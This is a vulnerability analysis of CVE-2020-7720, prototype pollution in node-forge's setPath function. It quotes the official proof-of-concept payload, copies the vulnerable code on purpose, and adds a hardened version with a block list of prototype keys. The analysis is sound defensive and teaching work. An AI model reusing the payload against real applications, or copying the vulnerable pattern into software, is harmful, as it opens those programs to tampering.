CVE-2020-7720 vulnerability analysis
1. Introduction
node-forge is a JavaScript cryptography library for Node.js and browsers. In versions before 0.10.0 its util.setPath() function is vulnerable to prototype pollution: an attacker who controls the key path passed to it can write properties onto Object.prototype, and every object that inherits from Object.prototype then sees those properties.
The official POC is as follows:
const nodeforge = require('node-forge');
var obj = {};
nodeforge.util.setPath(obj, ['__proto__', 'polluted'], true);
console.log(polluted);
2. Vulnerability reproduction and analysis
1. Environment setup
Install a node-forge release older than 0.10.0:
npm i [email protected]
2. Source code analysis
Following the POC, we go straight to the setPath function. Its source is short (as follows):
util.setPath = function(object, keys, value) {
  // need to start at an object
  if(typeof(object) === 'object' && object !== null) {
    var i = 0;
    var len = keys.length;
    while(i < len) {
      var next = keys[i++];
      if(i == len) {
        // last
        object[next] = value;
      } else {
        // more
        var hasNext = (next in object);
        if(!hasNext ||
          (hasNext && typeof(object[next]) !== 'object') ||
          (hasNext && object[next] === null)) {
          object[next] = {};
        }
        object = object[next];
      }
    }
  }
};
In the POC, keys is the array
['__proto__', 'polluted']
On the first iteration next is '__proto__'. The guard in the else branch does not help here: '__proto__' in object is true because the in operator walks the prototype chain, and object['__proto__'] is Object.prototype, which is a non-null object, so the function does not replace it with a fresh {} and simply descends into it:
object = object['__proto__']   // object is now Object.prototype
On the second and last iteration it performs the assignment:
object['polluted'] = true
Taken together, the two steps are:
object['__proto__']['polluted'] = true
which is Object.prototype.polluted = true. The prototype chain is now polluted: every object that inherits from Object.prototype reports a polluted property it never defined.
3. Vulnerability verification
console.log(polluted)
prints true: the bare identifier polluted is resolved on the global object, which itself inherits from Object.prototype, so the lookup ends at the polluted prototype. console.log({}.polluted) likewise prints true even though the object literal never defined that property.
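To make the difference between the vulnerable descent and a safe one concrete, here is an added example in JavaScript; it is not code from node-forge or from the original write-up. It copies the vulnerable setPath shown above, adds a hardened variant of my own (node-forge's actual 0.10.0 patch is not reproduced here), and a helper pollutes() that runs either variant on the POC key path and reports whether an unrelated object afterwards inherits the property. The names vulnerableSetPath, safeSetPath, BLOCKED_KEYS and pollutes are assumptions for this example.

```javascript
// Added example (not node-forge code): vulnerable setPath from the page,
// a hardened replacement, and a check that shows the difference.

// Vulnerable form, as shipped before node-forge 0.10.0 (behaviour kept on purpose).
function vulnerableSetPath(object, keys, value) {
  if (typeof object === 'object' && object !== null) {
    let i = 0;
    const len = keys.length;
    while (i < len) {
      const next = keys[i++];
      if (i === len) {
        object[next] = value;
      } else {
        // `in` walks the prototype chain, so '__proto__' is always "present",
        // and object['__proto__'] is Object.prototype, which passes the type checks.
        const hasNext = next in object;
        if (!hasNext || (hasNext && typeof object[next] !== 'object') ||
            (hasNext && object[next] === null)) {
          object[next] = {};
        }
        object = object[next];
      }
    }
  }
}

// Hardened form (my own, not node-forge's fix): reject keys that reach shared
// prototypes and only descend into own, plain-object properties.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeSetPath(object, keys, value) {
  if (typeof object !== 'object' || object === null) return object;
  for (const key of keys) {
    if (typeof key !== 'string' || BLOCKED_KEYS.has(key)) {
      throw new TypeError(`refusing to set unsafe key: ${String(key)}`);
    }
  }
  let cur = object;
  for (let i = 0; i < keys.length; i++) {
    const next = keys[i];
    if (i === keys.length - 1) {
      cur[next] = value;
      return object;
    }
    // hasOwnProperty does not follow the prototype chain when deciding to descend.
    const own = Object.prototype.hasOwnProperty.call(cur, next);
    if (!own || typeof cur[next] !== 'object' || cur[next] === null) {
      cur[next] = {};
    }
    cur = cur[next];
  }
  return object;
}

// Runs one setPath variant on a key path and reports whether an unrelated
// object afterwards inherits the last key, then undoes any pollution.
function pollutes(setPath, keys, value) {
  const target = {};
  const prop = keys[keys.length - 1];
  let threw = false;
  try {
    setPath(target, keys, value);
  } catch (e) {
    threw = true;
  }
  const victim = {};
  const leaked = victim[prop] === value &&
    !Object.prototype.hasOwnProperty.call(victim, prop);
  delete Object.prototype[prop]; // clean up so later code is unaffected
  return { threw, leaked };
}

console.log(pollutes(vulnerableSetPath, ['__proto__', 'polluted'], true)); // { threw: false, leaked: true }
console.log(pollutes(safeSetPath, ['__proto__', 'polluted'], true));       // { threw: true, leaked: false }
console.log(safeSetPath({}, ['a', 'b'], 1));                               // { a: { b: 1 } }
```

Run it with node. The hardened version refuses __proto__, constructor and prototype outright and uses hasOwnProperty rather than in when deciding whether to descend, so it never walks onto a shared prototype. Note that against the vulnerable code a ['constructor', 'prototype', 'polluted'] path does not pollute: typeof Object is 'function', so the guard replaces object.constructor with a fresh {} and the write lands on a local object. Blocking constructor anyway costs nothing and protects callers that later relax the typeof check.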